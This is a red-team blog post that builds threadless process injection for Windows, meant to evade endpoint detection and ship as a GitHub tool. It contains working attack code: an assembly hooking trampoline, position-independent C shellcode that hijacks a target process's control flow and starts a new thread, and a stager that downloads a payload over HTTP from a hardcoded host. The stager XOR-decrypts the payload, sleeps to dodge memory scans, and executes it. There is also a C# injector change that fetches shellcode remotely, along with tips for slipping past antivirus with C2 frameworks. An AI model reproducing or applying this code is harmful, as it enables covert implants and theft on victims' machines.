Threadless Ops - Enhanced Shellcoding for Threadless Injections

Process Injection is essential in red teaming and serves various strategic objectives, enabling attackers to expand their capabilities:

  • Privilege Escalation: Other processes may possess privileged rights, like browsers storing cookies or passwords, which an attacker can leverage.
  • Bypassing Restrictions: Security mechanisms such as EDRs (Endpoint Detection and Response) or other protective measures can often be bypassed, e.g., processes exempt from EDRs or allowed by Windows Firewall.
  • Improved Stability: An attacker can ensure execution by launching redundant code instances across multiple processes, enhancing persistence. Even if a process is terminated by the user, the attacker isn't entirely removed from the system.
  • Stealth: Attackers remain hidden within the target process, lowering the likelihood of detection. Actions like interacting with Kerberos appear less suspicious when executed from a browser process.

This topic has evolved from a simple malware technique into an essential red team tactic. As defensive products evolve, attackers and red teams continually innovate to develop stealthier injection methods.

The classic foundation of Process Injection leverages the Windows API and involves these three primary steps:

  • Memory allocation: Reserve space in the target process (e.g., using VirtualAllocEx).
  • Writing memory: Write payload (e.g., C2 agent) to allocated memory (e.g., using WriteProcessMemory).
  • Execution: Start a thread in the infected process to execute the payload (e.g., using CreateRemoteThread).

This traditional sequence of operations is closely monitored by modern EDR solutions. The combined use of these APIs will likely trigger an alert or even terminate the relevant processes automatically.

Other Process Injection methods can be found at MITRE ATT&CK - T1055 Process Injection. Interestingly, the Threadless Injection method is yet to be explicitly listed.

In this blog post, we dive deeper into Threadless Injection as an advanced form of process injection, analyze current methods and examples, and develop an improved strategy using custom shellcode. The finished results are available on GitHub as ThreadlessOps.

Explanation and Advantages of Threadless Injection

Threadless Injection is a modern process injection method, which eliminates the need for explicitly creating a dedicated execution thread, thereby reducing the number of steps from the three outlined above to just two. In contrast to the classic thread injection, the execution takes place naturally within an already-existing thread context of the target process. This makes detection much more difficult and typically requires manual thread hunting techniques (Advanced Thread Hunting in EDR products). Detection examples for such attacks can be found in this blog from Elastic Security Labs.

Threadless via Remote Function Hooking

One possibility for executing the injected code from within the target process itself is remote function hooking. Ceri Coburn demonstrates this in a clear and detailed way in his project Threadless Process Injection using remote function hooking and the associated presentation. Using this approach, functions which are called regularly during normal execution and that have already been loaded within the target process are overwritten with attacker-controlled code. After a short period of time, the target process naturally executes the payload.

Remote Function Hooking

The function targeted for overwriting (for example, NtWaitForSingleObject from NTDLL.dll) can be freely chosen. As a result, this technique becomes universally applicable to all processes that load the affected library. This effectively means that almost every process can be targeted. Therefore, this method is my preferred approach.

The project by Ceri Coburn also serves as the starting point for many other projects regarding Threadless Injection. However, the project itself primarily focuses on demonstrating the technique. Although example shellcode to launch a calculator program (calc.exe) is provided, the project lacks a functioning chaining mechanism and extensible shellcode integration, which are necessary for the reliable execution of custom payloads.

Threadless via Entry Point Injection

EPI (Entry Point Injection) is a project utilizing another variant of Threadless Injection, based on overwriting the entry points (DllMain) of DLL modules already loaded into the target process. These entry points are executed whenever a thread used by the target process is created or terminated.

From my perspective, this method constitutes an alternative approach, yet it has the significant disadvantage that not every process frequently creates or terminates threads. A practical advantage of this project is that complex shellcode has already been implemented to achieve functional payload execution with the Threadless technique. The payload shellcode itself has been generated using the sRDI project by monoxgas, which converts existing DLL files into executable memory shellcode. While this adds significant overhead, the development of standard DLLs remains easier compared to other shellcoding methods.

Is it really Threadless?

From my perspective, the implication of performing an injection without a thread is only partially true. While the initial execution during the injection indeed requires no new thread, it nonetheless runs in the context of an existing thread, thereby interrupting its regular operations.

Consider the scenario where we want to run a fully functional, stable C2-agent in the target process. Usually, we would require parallel execution via a dedicated new thread. However, we can better obfuscate the connection between the injection and the creation of this new thread by leveraging this technique, as the thread creation will be performed naturally by the target process itself.

If we only wish to perform a short or temporary task, we can completely omit creating a new thread. Such short tasks might include briefly executing a Windows command or modifying a Windows configuration. Because we temporarily hijack the original Control Flow, we must return control back to the target process as quickly as possible. Failure to do so may cause the target process to freeze or even crash. To avoid this issue, we need specially crafted shellcode that can inject the payload (such as a C2-agent) into a newly created thread within the target process and then cleanly restore the previously stolen control flow.

Is Threadless enough?

Threadless Injection is an effective evasion technique, but it is certainly not a universal solution. With this method, only a foothold in the target system can be obtained.

To ensure that you remain undetected afterwards, Yoann Dequeker combined this method with Module Stomping. He explained this technique at several events, including the Swiss Cybersecurity Conference 2024 - Uncommon Process Injection Pattern – Yoann Dequeker.

The underlying problem is that after injection, our shellcode, and thus our payload, is executed from newly allocated memory regions. This memory region is not derived from the original application or its modules, which can typically be found on disk. This distinction is referred to as Unbacked Memory, a feature easily visible with any debugger:

Unbacked Memory Example

  1. Here, you see the memory type IMG, which stands for Image and corresponds to Backed Memory. PRV stands for Private, corresponding to Unbacked Memory.
  2. Both highlighted memory regions under "Protection" have the execution flag (E) set and are located explicitly in Unbacked Memory.

Finding executable Unbacked Memory, as in this example, typically indicates injected malicious code. There are exceptions, e.g. the Just-In-Time (JIT) compilation process used by .NET processes creates executable Unbacked Memory as well. Nevertheless, this IOC (Indicator of Compromise) can be completely avoided by using Module Stomping. However, with Module Stomping, you're effectively substituting one IOC for another. In this particular case, we have to load another DLL inside the running process and then overwrite its allocated Backed Memory with our malicious code.
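From a defender's point of view, the check described above boils down to combining a region's type with its protection flags. The following is a minimal sketch of that classification. The constant values are the standard Win32 ones, but the region list is purely hypothetical sample data; a real tool would read the Type and Protect fields of MEMORY_BASIC_INFORMATION, for example via VirtualQueryEx.

```python
# Win32 memory constants (values as defined in the Windows SDK headers)
MEM_PRIVATE = 0x20000      # "PRV": private, unbacked memory
MEM_IMAGE = 0x1000000      # "IMG": memory backed by an image file on disk
PAGE_READWRITE = 0x04
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80

# Any of these bits means the region is executable
EXECUTABLE_MASK = (PAGE_EXECUTE | PAGE_EXECUTE_READ |
                   PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY)


def is_unbacked_executable(region_type, protection):
    """Return True for private (unbacked) regions that carry an execute flag."""
    return region_type == MEM_PRIVATE and bool(protection & EXECUTABLE_MASK)


# Hypothetical sample regions: (base address, type, protection)
regions = [
    (0x7FFA10000000, MEM_IMAGE, PAGE_EXECUTE_READ),   # code of a loaded DLL
    (0x1F0A0000000, MEM_PRIVATE, PAGE_EXECUTE_READ),  # executable private memory
    (0x1F0A0010000, MEM_PRIVATE, PAGE_READWRITE),     # ordinary heap-like data
]

suspicious = [hex(base) for base, region_type, protection in regions
              if is_unbacked_executable(region_type, protection)]
print(suspicious)
```

As noted above, a hit is only an indicator: JIT-compiled code in .NET processes produces the same pattern, so such findings need further triage.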

Another very effective evasion method is demonstrated by Fabian Mosch (S3cur3Th1sSh1t) in his project Caro-Kann. With this method, the payload, often including a known C2 agent which can be easily detected in memory, is delivered in an encrypted form. A small shellcode (stager) waits a few seconds before decrypting and executing the payload. Since we must always assume the existence of some IOCs, we expect EDR solutions to inspect the memory block where we create a new thread. Because our payload remains encrypted during the first few seconds after loading, the EDR should not detect known malicious patterns inside the memory.

My favorite project concerning Threadless Injection is ThreadlessStompingKann and the corresponding blog post by Caue Borella. This project combines three methods: Threadless Injection, Module Stomping and Caro-Kann to launch a C2 agent from the Havoc C2 framework.

However, this approach has the following disadvantages:

  • LoadLibrary is executed from Unbacked Memory for loading the DLL.
  • Threadless Injection is carried out multiple times.
  • Many calls to VirtualAlloc and VirtualProtect are executed on the target process.
  • Overall, large amounts of data are written into the memory of the target process.

Due to the invasive alteration of the target process memory and somewhat messy handling of loaded modules, this approach has a higher likelihood of detection. Additionally, the Caro-Kann project specifically expects to start from a dedicated new thread, which is not properly implemented in ThreadlessStompingKann. If the payload does not return its control flow, which is common for some C2 agents, the target process might freeze. In ThreadlessStompingKann, this scenario works because the Havoc payload itself independently creates a new thread shortly after execution.

New Deal

In principle, we can reuse and build upon a lot of existing resources. For example, I find that the shellcode from Caro-Kann provides a solid starting point to develop enhanced and customized shellcode. This particular shellcode appears to be based on the project C-To-Shellcode-Examples, which itself originates from the example PIC-Get-Privileges from the Blog by Chetan Nayak (ParanoidNinja) (the developer of the Brute Ratel C2 framework). Thus, optimized shellcode can be created, containing very little overhead in the generated machine code.

By setting up our own thread creation, we achieve better compatibility with various payloads. This approach eliminates the need for the payload itself to create new threads or repeatedly perform evasion techniques. This process can be further optimized through techniques like Caro-Kann or Module Stomping. If you examine the entire scenario closely, the term “threadless” becomes much less fitting. However, given that the thread creation responsibility was delegated to the Havoc payload in the ThreadlessStompingKann project, I do not see any particular disadvantage.

To optimize the Module Stomping method, we must hide the required call to the LoadLibrary Windows API. We must consider that such calls might be detected by EDR solutions via user-mode hooking or telemetry data (ETWTI). This is currently a limitation in all previously mentioned projects. Evading this detection technique reliably may seem challenging, but Chetan Nayak (ParanoidNinja) presented a viable solution in his blog Dark Vortex, illustrating how he implemented this evasion technique in his own C2 framework. He explains clearly how ETWTI stack tracing works and how to evade it through callback evasion. Additionally, Shayan Muhammad introduced another Windows API which is useful for callback evasion in his Medium article.

Furthermore, I consider minimizing interactions with the target process beneficial. Thus, I will implement an option to download and load the payload from within the context of the target process itself, rather than passing it at injection time. The shellcode can then copy itself into a newly loaded Backed Memory region. The overall layout of this new plan now looks like this:

Shellcode Injection Overview

  1. We inject our shellcode into the target process (e.g., ms-teams.exe).
  2. We overwrite a selected function (e.g., NtWaitForSingleObject from NTDLL.dll) within that process, so that when it gets called, our shellcode is executed.
  3. We wait until the injected process naturally calls the overwritten function.
  4. The overwritten function gets executed, triggering our shellcode.
  5. Initially, we reside inside Unbacked Memory and use callback evasion techniques to stealthily load another module (e.g., chakra.dll).
  6. The shellcode copies itself into the newly loaded legitimate Backed Memory area.
  7. We overwrite the original function once again to execute the copied shellcode residing in the legitimate Backed Memory region.
  8. After returning from our hooking function, an immediate call is made to our copied shellcode.
  9. A new thread is created and will now execute independently.
  10. We restore the originally overwritten function back to its initial state and return control flow.
  11. The original function resumes its normal execution.

Now our thread runs independently. It initially waits a few seconds to mitigate in-memory scans and detection strategies. Optionally, the payload can then be downloaded if it is not already included within the shellcode, after which it will be decrypted and executed.

Shellcode Development (Part 1 of 2)

After covering the theory, it is time to get into the practical details. To avoid overwhelming you with a single blog post, I have decided to split this topic into two parts. In this first part, we focus on the later stage of our attack chain, which is visible on the right-hand side of the overview illustration. This includes the required shellcode steps to:

  • create a new thread,
  • load a payload from the network,
  • decrypt and execute the payload.

Towards this end, I slightly adjusted the method from Caro-Kann and fixed an existing issue in the decryption function. Building on this, we will implement callback evasion, Module Stomping, and shellcode replication in the second part of this series.

All the necessary resources and code samples are available in my GitHub project ThreadlessOps.

Compiling, Executing and Testing

As the operating system, I recommend using Kali Linux, since it already includes the required build and compilation tools. Visual Studio Code can optionally be installed for easier development. To compile the project, both GCC and NASM are required. If development is not carried out on Linux, some adjustments in the project will need to be made.

For initial testing, we will use a simple example. In the project file Shellcode/Shellcode.c, we write the following source code:

            
                   

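#include "APIResolve.h"

void Main()
{
    // Build the string on the stack, character by character
    char message[] = { 'H', 'e', 'l', 'l', 'o', ' ', 'W', 'o', 'r', 'l', 'd', '!', 0x00 };

    // Resolve MessageBoxA at runtime instead of importing it
    uint64_t _MessageBoxA = getFunctionPtr(HASH_USER32, HASH_MESSAGEBOXA);

    // Same string as text and caption; uType 1 = MB_OKCANCEL
    ((MESSAGEBOXA)_MessageBoxA)(0, message, message, 1);
}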

Strings within shellcode cannot be declared in the usual way. Since we require position-independent code (PIC), the shellcode must not reference separate data sections: a regular string literal would be placed in a read-only data section that is not part of the extracted shellcode. Avoiding such references ensures our code can run at any arbitrary location in memory. Therefore, strings must instead be declared as individual char arrays on the stack. Similarly, we cannot include direct module or API calls, so we rely on the included getFunctionPtr() function. This function locates the desired Windows API functions in the current process memory and returns a pointer to their memory addresses. This function, along with the type definitions for the Windows API, is provided and loaded through the included APIResolve.h header file.
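Writing such char arrays by hand quickly becomes tedious. As a convenience, a small helper script can generate the initializer. The sketch below is not part of ThreadlessOps; the function name to_stack_chars is an assumption made for illustration, and it only handles printable ASCII.

```python
def to_stack_chars(text):
    """Render text as a C char-array initializer with a trailing NUL byte."""
    parts = []
    for ch in text:
        if ch in ("'", "\\"):
            # Single quotes and backslashes must be escaped in C char literals
            parts.append("'\\" + ch + "'")
        elif ch.isascii() and ch.isprintable():
            parts.append("'" + ch + "'")
        else:
            raise ValueError("only printable ASCII is supported: %r" % ch)
    parts.append("0x00")
    return "{ " + ", ".join(parts) + " }"


# Prints the initializer used for the message in the example above
print("char message[] = " + to_stack_chars("Hello World!") + ";")
```

The output can be pasted directly into Shellcode.c.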

To create the shellcode, run the provided script within the project's root folder.

Build Shellcode

The result is a compact binary file of size 432 bytes. Using the command ndisasm -b 64 Shellcode.bin, you can disassemble this binary file into readable assembly code. Because only the code that is actually needed gets compiled in, the shellcode contains very little overhead.

This shellcode is essentially universal and can now be used in any shellcode loader you prefer. If you would like to test it with Threadless Injection, two options are available:

On a system with disabled Antivirus/EDR, you can directly use the original project: Threadless Process Injection using remote function hooking. This was also my preferred method. I added the following enhancement in C# to allow downloading my compiled shellcode directly across the network:

            
                   

// Added function: download the compiled shellcode over HTTP
static byte[] DownloadShellcode(string u)
{
    using (var client = new System.Net.WebClient())
    {
        try
        {
            return client.DownloadData(u);
        }
        catch (Exception)
        {
            // Return an empty array if the download fails
            return new byte[] { };
        }
    }
}

// Changed function: ignore the file path and fetch the shellcode from the test server
private static byte[] LoadShellcode(string path)
{
    return DownloadShellcode("http://192.168.247.131:80/Shellcode.bin");
}

Additionally, there is a potential problem in the original injection project. After executing our shellcode, the injector will release its allocated memory back to the target process. If the shellcode is still running at this point, e.g. displaying a MessageBox, this will cause an application crash (AccessViolationException). To prevent this, remove the corresponding calls to FreeVirtualMemory and ProtectVirtualMemory, as shown here:

Bugfix Threadless Injector

If you would rather test this with active Antivirus/EDR, you need an existing Evasion technique such as the one provided by the Sliver C2 Framework, which already contains a Threadless Inject Beacon Object File (BOF). With this, you can run and test your new Threadless Injection shellcode directly from your Kali Linux machine. In my case, I used my own undetected PowerShell-based loader for testing:

Test Threadless Sliver

Whenever NtWaitForSingleObject is eventually called by the target process (notepad.exe in this example), our shellcode is executed. In this case, this particular Windows API is used by the process when it opens a new dialog window, for instance via the menu item Help -> Info.

Result Threadless Test

Instead of NtWaitForSingleObject, different target functions can be selected. Some are suitable options, and some less so. In his YouTube video, Fabian Mosch (S3cur3Th1sSh1t) explains how to find the right function for a particular use case.

Debugging

During development, errors can occur. My preferred tool for analyzing such scenarios is x64dbg. An important aspect in Threadless Injection with function hooking is the temporary redirection of the control flow in a manner that is unintended by the original function. As a result, we violate the standard x64 calling convention. Normally, a called function only has to preserve the non-volatile registers (such as RBX, RSP, R12, etc.). However, in our scenario, volatile registers must also be restored; otherwise, the original function cannot continue execution correctly after executing our injected shellcode.

To address this, the original project by Ceri Coburn implemented a ShellcodeLoader - a trampoline that is combined with the injected shellcode. Additionally, it is responsible for restoring the overwritten function's original bytes after shellcode execution:

            
                   

start:
    pop     rax                             ; Save return address in RAX
    sub     rax, 0x5                        ; Adjust return address backwards
    push    rax                             ; Save registers on the stack
    push    rcx
    push    rdx
    push    r8
    push    r9
    push    r10
    push    r11
    movabs  rcx, 0x1122334455667788         ; Restore original bytes at the return address (unhook code)
    mov     QWORD PTR [rax], rcx
    sub     rsp, 0x40                       ; Make stack space for shellcode
    call    shellcode                       ; Execute shellcode
    add     rsp, 0x40                       ; Restore stack and registers
    pop     r11
    pop     r10
    pop     r9
    pop     r8
    pop     rdx
    pop     rcx
    pop     rax
    jmp     rax                             ; Jump back to return address
shellcode:

First, the return address is popped from the stack and corrected by subtracting 5 bytes, so that it points back to the start of the injected call instruction rather than to the instruction after it. This enables the restored original code to be seamlessly executed at the same location afterwards. To restore the original code, the trampoline contains a placeholder (0x1122334455667788), which is replaced by the original bytes during the injection. Additionally, registers are saved on the stack (push) and later restored (pop) after running our shellcode (call shellcode). Finally, execution is returned with a jump (jmp rax).
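The value 5 comes from the size of the hook itself. Assuming the hook is a relative call (opcode 0xE8 followed by a 32-bit signed displacement), the instruction is 5 bytes long, and the CPU pushes the address of the byte right after it as the return address. The arithmetic can be sketched as follows; the addresses are made-up example values and the helper names are assumptions for illustration.

```python
import struct

CALL_REL32_LEN = 5  # 1 opcode byte (0xE8) + 4-byte signed displacement


def encode_call(hook_addr, target_addr):
    """Encode `call target_addr` as it would be placed at hook_addr."""
    # The displacement is relative to the address of the NEXT instruction.
    rel = target_addr - (hook_addr + CALL_REL32_LEN)
    # struct.error is raised if the target is not within +/- 2 GiB.
    return b"\xE8" + struct.pack("<i", rel)


def pushed_return_address(hook_addr):
    """Address that the call instruction pushes onto the stack."""
    return hook_addr + CALL_REL32_LEN


hook = 0x1000     # hypothetical address of the hooked function
loader = 0x2000   # hypothetical address of the trampoline

print(encode_call(hook, loader).hex())
# Subtracting 5 from the pushed return address yields the hook address again
print(hex(pushed_return_address(hook) - CALL_REL32_LEN))
```

This is why `sub rax, 0x5` lands exactly on the first overwritten byte, which is also where the original 8 bytes are written back.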

We can verify this behavior by setting a hardware breakpoint at the overwritten function inside the debugger. We should observe two distinct breakpoint hits:

  • The first breakpoint indicates the execution of the injected code that points to our combined shellcode.
  • The second breakpoint occurs after the function restoration, showing its original code being correctly executed.

At both points, we have the opportunity to examine registers and the stack in detail. The highest stability is ensured when all registers and stack content remain fully unchanged. In my example, the target function is NtWaitForMultipleObjects from NTDLL.dll.

Execution after function overwrite (Hooked):

Debugger Function Hooked

Execution after function restoration:

Debugger Function Restored

At point (1) in the screenshots, we clearly observe the injected call pointing initially to our shellcode and afterwards being restored back to its original bytes. At points (2) and (3), we examine registers and the stack before and after shellcode execution. Note that the RAX register is altered. This register was used by the trampoline at the end of execution (pop rax, jmp rax) to resume normal function flow. Since RAX was not further utilized by the original function, this alteration does not cause any errors.

It is crucial to highlight that some publicly available shellcodes found online do not reliably restore stack state and registers. These shellcodes are not suitable for this use case, since they will inevitably lead to crashes.

Creating a New Thread

We now restore our test shellcode in Shellcode/Shellcode.c back to the current project's state on ThreadlessOps. This code includes different steps relevant to the first segment of this blog post. In the Main function, you can find the code necessary to start a new thread:

            
                   

    // Define CreateThread function
    uint64_t _CreateThread = getFunctionPtr(HASH_KERNEL32, HASH_CREATETHREAD);
    CREATE_THREAD pCreateThread = (CREATE_THREAD)_CreateThread;

    // Variables for thread creation
    DWORD threadId;

    // Create thread pointing to the function Thread(NULL)
    pCreateThread(
        NULL,                  // Default security attributes
        0,                     // Default stack size
        Thread,                // Function to execute in thread
        NULL,                  // Parameter to thread-specific function
        0,                     // Run immediately
        &threadId              // Thread ID
    );

Since our shellcode has been called by an overwritten Windows API, we currently operate within the stolen Control Flow of the target process. This requires us to return control to the original process as quickly as possible. To achieve this, we immediately create a new thread that points to the Thread function. For this task, we invoke the Windows API function CreateThread from Kernel32.dll. Following thread creation, we return execution to the shellcode entry point alignstack.asm, which then returns to the ShellcodeLoader trampoline. This trampoline ensures the stable continuation of the hijacked process.

At this point, we have successfully created a new thread in the process, allowing us to run independently from the target process's normal execution flow and correctly restore the stolen Control Flow.

Payload Download

We can now download the desired payload from a remote host in the new thread. For this purpose, we use WinINet functions such as HttpOpenRequestA (declared in wininet.h), which requires the Microsoft module wininet.dll to be loaded. This loading is handled automatically by the provided getFunctionPtr function: if a requested module is not yet loaded, getFunctionPtr transparently loads it via a call to LoadLibrary. The parameters for the download hostname, port, and filename are defined outside of the DownloadDecryptExecutePayload function:

            
                   

// Parameter in memory to provide the HTTP hostname for the payload
void PayloadHostname()
{
    asm(".byte '1', '9', '2', '.', '1', '6', '8','.', '2', '4', '7', '.', '1', '3', '1', 0x00");
}

// Parameter in memory to provide the HTTP port for the payload
void PayloadPort()
{
    asm(".long 80");
}

// Parameter in memory to provide the HTTP filename of the payload
void PayloadFilename()
{
    asm(".byte 'E', 'n', 'c', 'r', 'y', 'p', 't', 'e', 'd', 'P', 'a', 'y', 'l', 'o', 'a', 'd', '.', 'b', 'i', 'n', 0x00");
}

The advantage of this approach lies in the generated machine code. These bytes are easy to locate in the compiled shellcode, allowing us to adjust the resource location directly, e.g. dynamically modifying the IP address at injection time. Since these are Null-terminated strings, the last byte must be a NUL character (0x00). Immediately following the terminated string, the byte 0xC3 (RET instruction) marks the function return. Nevertheless, we merely use these functions as memory pointers to the specified variables. The referenced data is easily observable with a hex editor:
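Adjusting such a parameter in the compiled binary is a simple search-and-replace on the byte level, as long as the surrounding bytes do not move. The following sketch illustrates the idea on a tiny stand-in blob instead of a real Shellcode.bin; the helper name patch_c_string is an assumption for illustration and not part of ThreadlessOps. The replacement must not be longer than the original string, and shorter values are padded with NUL bytes so that the following 0xC3 stays at its offset.

```python
def patch_c_string(blob, old, new):
    """Replace the NUL-terminated ASCII string `old` in blob with `new`.

    The blob length is preserved: `new` may be shorter than `old` (it is
    padded with NUL bytes), but never longer.
    """
    old_bytes = old.encode("ascii") + b"\x00"
    new_bytes = new.encode("ascii")
    if len(new_bytes) > len(old_bytes) - 1:
        raise ValueError("replacement does not fit into the original slot")
    offset = blob.find(old_bytes)
    if offset < 0:
        raise ValueError("original string not found")
    if blob.find(old_bytes, offset + 1) >= 0:
        raise ValueError("original string is ambiguous")
    padded = new_bytes.ljust(len(old_bytes), b"\x00")
    return blob[:offset] + padded + blob[offset + len(old_bytes):]


# Stand-in for compiled shellcode: filler bytes, the hostname, then RET (0xC3)
blob = b"\x90\x90" + b"192.168.247.131\x00" + b"\xc3" + b"\x90"
patched = patch_c_string(blob, "192.168.247.131", "10.0.0.5")
print(patched.hex())
```

Refusing ambiguous matches is a deliberate choice here: patching the wrong occurrence would silently corrupt the code.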

Shellcode Download Address

Because Module Stomping has not been implemented yet at this stage, we still load the payload into a newly allocated memory region. Since this region is created with VirtualAlloc, our payload currently resides in Unbacked Memory. We will address and correct this particular issue later, in part two, via Module Stomping.

            
                   

void DownloadDecryptExecutePayload() {

...
    char* hostname = (char*) &PayloadHostname;
    LPCTSTR endpoint = (LPCTSTR) &PayloadFilename;
    uint32_t port = *( (uint32_t*)PayloadPort);

    HINTERNET h_session = NULL, h_connect = NULL, h_request = NULL;
    DWORD dw_read = 0, dw_read_total = 0, dw_success = 0;
    char method[] = { 'G', 'E', 'T', 0x00 };

    SIZE_T mem_size = 1024*1024;  // Max Size of Payload!! 1MB
    LPVOID ptr_memory = ((VIRTUALALLOC)_VirtualAlloc)(0, mem_size, MEM_COMMIT, PAGE_READWRITE);
...

}

Here, we see the assignment of previously defined parameters (PayloadHostname, PayloadFilename, PayloadPort) and the initialization of the new memory region for storing the payload (ptr_memory). An important limiting factor when downloading is mem_size. Because of this, payloads may not exceed 1 MB.

Payload Decryption and Execution

For payload decryption, we're using the decryption function from the project Caro-Kann created by Fabian Mosch (S3cur3Th1sSh1t). In this implementation, Andrei Herasimau corrected a bug in the second loop at buf8[i] ^= (uint8_t)(xorKey & 0xFF);. Previously, every trailing byte was XORed with the lowest key byte only, so the last bytes were decrypted incorrectly in 50% of the payloads, namely whenever the payload length modulo 4 was 2 or 3.

            
                   

void PayloadDecryptionKey()
{
    asm(".byte 0x01, 0x02, 0x03, 0x04");
}

// Function to decrypt the payload with a key
void xor32(LPVOID buf, DWORD bufSize)
{
    // xorKey is read from the bytes stored in PayloadDecryptionKey() and interpreted as a uint32_t
    uint32_t xorKey = *(uint32_t*)PayloadDecryptionKey;
    uint8_t* buf8 = (uint8_t*)buf;

    // Number of complete 32-bit words in the buffer
    size_t bufSizeRounded = (bufSize - (bufSize % sizeof(uint32_t))) / sizeof(uint32_t);

    for (size_t i = 0; i < bufSizeRounded; i++)
    {
        ((uint32_t*)buf8)[i] ^= xorKey;
    }

    // Remaining tail bytes (at most 3)
    for (size_t i = sizeof(uint32_t) * bufSizeRounded; i < bufSize; i++)
    {
        size_t x = i % sizeof(uint32_t); // offset within the key; also avoids a modulo by zero if bufSize < 4
        buf8[i] ^= (uint8_t)((xorKey >> (8 * x)) & 0xFF); // shift and xor bytes
    }
}

This function processes the payload in 32-bit words, handles any remaining bytes at the end individually, and applies an XOR operation using a predefined key. This key must exactly match the encryption key defined in the payload encryptor Encrypt_Payload.py:
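To reason about the tail handling without a debugger, the decryption can be modeled offline. The sketch below is an assumption-laden Python model of the intended behavior, not the project's code: it reads the key as a little-endian 32-bit value (as an x64 CPU would), computes the tail offset as i % 4, and offers a switch that reproduces the earlier behavior of always using the lowest key byte.

```python
import struct

KEY = bytes.fromhex("01020304")


def xor32_model(buf, key=KEY, fixed=True):
    """Model of xor32(): whole 32-bit words first, then the tail bytes."""
    xor_key = struct.unpack("<I", key)[0]  # little-endian, as on x64
    words = len(buf) // 4
    out = bytearray(buf)
    for i in range(words):
        (word,) = struct.unpack_from("<I", out, 4 * i)
        struct.pack_into("<I", out, 4 * i, word ^ xor_key)
    for i in range(4 * words, len(buf)):
        # fixed=False mimics the old code, which ignored the byte offset
        x = i % 4 if fixed else 0
        out[i] ^= (xor_key >> (8 * x)) & 0xFF
    return bytes(out)


def xor_bytewise(buf, key=KEY):
    """Reference: plain repeating-key XOR, one byte at a time."""
    return bytes(b ^ key[i % 4] for i, b in enumerate(buf))


# Buffer lengths for which the old tail handling produces wrong output
affected = [n for n in range(1, 9)
            if xor32_model(bytes(n), fixed=False) != xor_bytewise(bytes(n))]
print(affected)
```

With distinct key bytes, exactly the lengths with a remainder of 2 or 3 modulo 4 are affected, which matches the 50% failure rate mentioned above.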

            
                   

def long_key():
    key_string = "01020304" # Payload Encryption Key
    return bytes.fromhex(key_string)
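The rest of Encrypt_Payload.py is not reproduced in this post. As a rough sketch of what a matching encryptor could look like, the following applies a repeating four-byte XOR, which is the byte-level equivalent of the word-wise decryption on a little-endian system. The function encrypt_payload and the constant MAX_PAYLOAD_SIZE are assumptions for illustration; the size check mirrors the 1 MB mem_size limit of the download buffer.

```python
MAX_PAYLOAD_SIZE = 1024 * 1024  # mirrors mem_size in the shellcode (1 MB)


def long_key():
    key_string = "01020304"  # Payload Encryption Key
    return bytes.fromhex(key_string)


def encrypt_payload(data, key=None):
    """XOR data with a repeating 4-byte key; the same call decrypts again."""
    key = long_key() if key is None else key
    if len(key) != 4:
        raise ValueError("the shellcode expects a 4-byte key")
    if len(data) > MAX_PAYLOAD_SIZE:
        raise ValueError("payload exceeds the 1 MB download buffer")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


plain = b"example payload bytes"
encrypted = encrypt_payload(plain)
# XOR is its own inverse, so a second pass restores the input
print(encrypt_payload(encrypted) == plain)
```

Rejecting oversized payloads at encryption time surfaces the limit early instead of failing later inside the target process.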

To successfully execute the entire process, several additional steps are required. First, we wait a few seconds using the Sleep function to evade in-memory scanning from EDR/AV solutions. We must also adjust the protections on our allocated memory space: setting it initially to RWX for decryption, and then finally adjusting it to RX during payload execution. We specifically choose RWX initially in case the payload shares the same memory region as the shellcode.

            
                   

void DecryptExecutePayload(LPVOID payload, DWORD len) {
    uint64_t _Sleep = getFunctionPtr(HASH_KERNEL32, HASH_SLEEP);

    // Wait 2 seconds before changing protection
    ((SLEEP)_Sleep)(2000);

    // Update protection of payload to PAGE_EXECUTE_READWRITE (RWX)
    DWORD oldProtect;
    uint64_t _VirtualProtect = getFunctionPtr(HASH_KERNEL32, HASH_VIRTUALPROTECT);
    ((VIRTUALPROTECT)_VirtualProtect)(payload, len, PAGE_EXECUTE_READWRITE, &oldProtect);

    // Wait 3 seconds before decrypting and execution of payload
    ((SLEEP)_Sleep)(3000);

    // Decrypt payload
    xor32(payload, len);

    // Update protection of payload to PAGE_EXECUTE_READ (RX)
    ((VIRTUALPROTECT)_VirtualProtect)(payload, len, PAGE_EXECUTE_READ, &oldProtect);

    // Execute payload
    ((void (*)())payload)();
}

In the end, we execute our payload. This line of code casts our payload to a function pointer and calls the function in this manner. We notably omit a direct trampoline-based jump, which was utilized by the original Caro-Kann project. Given that we will have properly backed memory and our call stack should remain clean, I see no clear advantage in retaining the trampoline jump.

Conclusion

Through this research, I was able to dive deeply into the topic of process injection techniques. It became clear that there still exist viable options for attackers today. The available techniques are sophisticated and apparently remain undetected by common EDR/AV products. However, effective defense strategies are already emerging, such as the approaches presented in the previously mentioned blog article by Elastic Security Labs, which Blue Teams can utilize.

Nevertheless, generating reliable IOCs to detect such attacks remains challenging in practice, especially in modern software environments that use technologies such as JIT compilation, which is commonly found in .NET processes. Even so, successful implementation of these advanced offensive techniques today requires a high degree of expertise and practical experience.
